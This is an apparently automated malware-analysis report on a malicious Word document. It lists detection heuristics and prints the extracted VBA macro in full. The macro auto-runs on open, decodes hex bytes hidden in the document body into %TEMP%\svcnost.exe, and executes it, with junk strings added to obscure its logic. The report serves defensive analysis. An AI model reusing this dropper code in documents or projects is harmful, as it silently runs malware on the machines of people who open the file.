MALICIOUS
Risk Score: 214
Heuristics: 10
- ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
  - Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Shell utututut, iR3t + 1 - 1`
  - AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script: `Sub AutoOpen()`
  - Workbook_Open macro (low, OLE_VBA_WBOPEN). Matched line in script: `Sub Workbook_Open()`
  - Auto_Open macro (low, OLE_VBA_AUTO). Matched line in script: `Sub Auto_Open()`
  - Environ() call (env variable access) (low, OLE_VBA_ENVIRON). Matched line in script: `tmm1 = Environ("T" & strTitle)`
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main. Channel: In document text (OLE body)
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1586 bytes |

SHA-256: 9bea84b68819b55860b13a12342e7b040182f449e392137adba8e1158fb07991

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
    networkk
End Sub
Sub AutoOpen()
    Auto_Open
End Sub
Sub Workbook_Open()
    Auto_Open
End Sub
Sub networkk()
    Dim zzzzz
    zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
    Dim tmm1
    Dim t7nb
    Dim bywr
    Dim li7np9f
    Dim iR3t As Integer
    Dim strPrompt As String
    Dim strTitle As String
    Dim ddddd
    ddddd = ActiveDocument.Range.Text
    strPrompt = "fsgsrg343454t4t rga dfgs3dfgsdf g" & "fa44tggsr3tsdgsg fgs fsgdf"
    strTitle = "sdfgsr3333edfgsdf324234"
    strTitle = "E" & "M" & "P"
    tmm1 = Environ("T" & strTitle)
    strTitle = "x" & "e"
    t7nb = tmm1 & "sv" & "c" & "no" & "st.e" & strTitle
    Dim Data
    Data = Replace(ddddd, " ", "1")
    zzzzz = "sdfs4738946789045643728945764738495864378467fsd"
    Dim sop
    Dim sop22
    Dim Symbol
    Dim utututut
    Dim byswr
    strTitle = "8"
    sop = InStr(12, Data, "5" & "67" & strTitle)
    sop22 = InStr(12, Data, "99" & "997" & strTitle)
    byswr = sop + 2 + 22 - 20
    i7np9f = FreeFile
    Open t7nb For Binary Lock Write As #i7np9f
    While (byswr < sop22)
        Symbol = Mid(Data, byswr, 902 - 900)
        zzzzz = "123123123123"
        strTitle = "H"
        Put #i7np9f, , CByte("&" & strTitle & Symbol)
        byswr = byswr + 5 - 3
    Wend
    iR3t = 1
    Close #i7np9f
    utututut = t7nb
    Shell utututut, iR3t + 1 - 1
End Sub
Private Sub Document_New()
End Sub
```